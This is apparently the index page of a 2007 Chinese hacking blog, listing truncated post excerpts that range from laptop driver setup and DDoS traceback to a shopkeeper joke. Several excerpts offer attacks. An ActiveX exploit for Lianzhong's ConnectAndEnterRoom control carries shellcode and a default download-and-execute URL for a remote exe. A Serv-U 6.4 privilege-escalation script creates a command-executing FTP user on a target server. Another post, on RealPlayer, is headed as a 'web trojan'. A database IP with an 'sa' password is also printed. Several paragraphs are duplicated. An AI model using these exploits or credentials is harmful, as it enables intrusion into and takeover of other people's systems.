IBM T61最新驱动下载以及完整版安装说明
[ 2007年11月27日 ]
Tags:
PS:T61要安装的驱动实在太多了
一般T61 装机有几个地方是最需要注意的
1,SATA硬盘的问题 ,常规的XP安装盘在安装过程中将会认不到硬盘(这个可能是地球人都知道的问题 了)
2,就是声卡驱动和MODEM驱动的问题 (这个在T60时代就己经发生了,并己经被解决)
3,带摄像头的T61,在装完主板驱动之后会出现无法在关机的情况
接下来就让我一步一步带您在您的爱机上安装一个纯静的XP系统吧
阅读全文 | 分类:心情随笔 | 评论:4 | 引用:0 | 浏览:
渗透工具hijack使用原版说明
[ 2007年11月25日 ]
Tags: hijack
From:网络这个是原版附带的说明。usage: hijack <-LVXhefvqsxrkHDtNzoi> <-d dev> <-S interval> <-l logfile><-W normal|byline|none> <-F jobfile> <-p port> <-c http_flag><-IO pcap_dump> <-E quit time> <-R r...
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
RealPlayer 最新网马
[ 2007年11月25日 ]
Tags: RealPlayer 网马
关于该漏洞的说明(来自绿盟):
Quotation
RealPlayer ierpplug.dll ActiveX控件播放列表名称栈溢出漏洞
RealPlayer是一款流行的媒体播放器,支持多种媒体格式。
RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件在处理播放列表名时存在栈溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。
由于可使用ierpplug.dll所提供的IERPCtl ActiveX控件将本地文件导入到RealPlayer中指定的播放列表,因此如果用户受骗访问了恶意网页并通过IERPCtl ActiveX控件的Import()方式导入了恶意文件的话,就可以触发这个溢出,导致拒绝服务或执行任意指令。
Quotation
RealPlayer ierpplug.dll ActiveX控件播放列表名称栈溢出漏洞
RealPlayer是一款流行的媒体播放器,支持多种媒体格式。
RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件在处理播放列表名时存在栈溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。
由于可使用ierpplug.dll所提供的IERPCtl ActiveX控件将本地文件导入到RealPlayer中指定的播放列表,因此如果用户受骗访问了恶意网页并通过IERPCtl ActiveX控件的Import()方式导入了恶意文件的话,就可以触发这个溢出,导致拒绝服务或执行任意指令。
阅读全文 | 分类:矩阵毒刺 | 评论:0 | 引用:0 | 浏览:
联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)
[ 2007年11月24日 ]
Tags: Exploit
exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://www.4shell.org/3.exe" )'code by NetPatchif exeurl <> "" thencode="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x7...
阅读全文 | 分类:矩阵毒刺 | 评论:0 | 引用:0 | 浏览:
别再让注射遗传下去-杜绝对象查询注射
[ 2007年11月24日 ]
Tags: SQL Injection
TEAM : I.S.T.O
AUTHOR : kj021320
官方BLOG : http://blog.csdn.net/I_S_T_O
转载需注明作者,未经作者同意,不得用于任何形式的商业活动
现在越来越流行ORM技术~~~程序员把有关数据库的操作都交给持久层去处理,
也为了更方便所以框架也提供了另外对象查询语言例如HIBERNATE的HQL EJB的EJBQL等
这是好事吗?恩 的确很好~对于严谨的程序员来说!但是对于那些对技术一知半解的就不一定了!
或者对于那些偷懒的人来说更是糟糕的事情
以下我分别采用3大常用的持久层框架,加上代码的片段
AUTHOR : kj021320
官方BLOG : http://blog.csdn.net/I_S_T_O
转载需注明作者,未经作者同意,不得用于任何形式的商业活动
现在越来越流行ORM技术~~~程序员把有关数据库的操作都交给持久层去处理,
也为了更方便所以框架也提供了另外对象查询语言例如HIBERNATE的HQL EJB的EJBQL等
这是好事吗?恩 的确很好~对于严谨的程序员来说!但是对于那些对技术一知半解的就不一定了!
或者对于那些偷懒的人来说更是糟糕的事情
以下我分别采用3大常用的持久层框架,加上代码的片段
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
SERV-U 6.4提权方法,通杀SERV-U版本
[ 2007年11月24日 ]
修改ftpport为21 修改newdomain后面的goldsun| IP(为要提权的服务器的IP地址)|修改newuser后面的 -IP=IP地址和上面一样(为要提权的服务器的IP地址)...OK.....提权...会用FTP增加一个可以执行命令的用户.....有个这个用户什么不能做哈.....ftpport = 65500timeout=3loginuser = "User " & user & vbCrLfloginpass = "Pass ...
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
伪造asp sql注入点的完整文件
[ 2007年11月21日 ]
Tags: SQL Injection
数据库服务器 10.0.5.195
帐户 sa
密码 accountbase
数据库名 gameaccount_server
帐户 sa
密码 accountbase
数据库名 gameaccount_server
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
反黑经验:深入了解 DDoS与 DDoS追踪
[ 2007年11月19日 ]
链级测试 (Link Testing)
多数的追踪技术都是从最接近victim的路由器开始,然后开始检查上流数据链,直到找到攻击流量发起源。理想情况下,这种过程可以递归执行直到找到攻击源头。这种技术假设攻击一直保持活动直到完成追踪,因此很难在攻击结束后、间歇性攻击或对追踪进行攻击调整等情况进行追踪。包括下面两种链级测试:
1、Input debugging
很多路由器都提供Input debugging特性,这能让管理员在一些出口端过滤特定的数据包,而且能决定可以达到那些入口。这种特性就被用来作traceback:首先,victim在确定被攻击时,要从所有的数据包中描述出攻击包标志。通过这些标志,管理员在上流的出口端配置合适的Input debugging。这个过滤会体现出相关的input端口,这个过滤过程可以一直朝上流进行,直到能够到达最初的源头。当然这种工作很多依靠手工,一些国外的ISP联合开发的工具能够在它们的网络中进行自动的追踪。
多数的追踪技术都是从最接近victim的路由器开始,然后开始检查上流数据链,直到找到攻击流量发起源。理想情况下,这种过程可以递归执行直到找到攻击源头。这种技术假设攻击一直保持活动直到完成追踪,因此很难在攻击结束后、间歇性攻击或对追踪进行攻击调整等情况进行追踪。包括下面两种链级测试:
1、Input debugging
很多路由器都提供Input debugging特性,这能让管理员在一些出口端过滤特定的数据包,而且能决定可以达到那些入口。这种特性就被用来作traceback:首先,victim在确定被攻击时,要从所有的数据包中描述出攻击包标志。通过这些标志,管理员在上流的出口端配置合适的Input debugging。这个过滤会体现出相关的input端口,这个过滤过程可以一直朝上流进行,直到能够到达最初的源头。当然这种工作很多依靠手工,一些国外的ISP联合开发的工具能够在它们的网络中进行自动的追踪。
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
手机店老板与买家的幽默对话
[ 2007年11月19日 ]
Tags: 大杂烩
买家: 请问欧版和行货为什么要分开卖? 卖家:因为粘在一起不方便使用 买家:。。。。。。。。 买家:老板,你说欧版质量好,还是行货质量好? 卖家:也许是欧版的吧! 买家:为什么? 卖家:因为我只见过行货有专门的维修中心。 买家:老板,能不能帮我挑一部最好的? 卖家:好的,我把几百部手机组织起来,让它们先海选后 PK 。 ...
阅读全文 | 分类:心情随笔 | 评论:0 | 引用:0 | 浏览:
|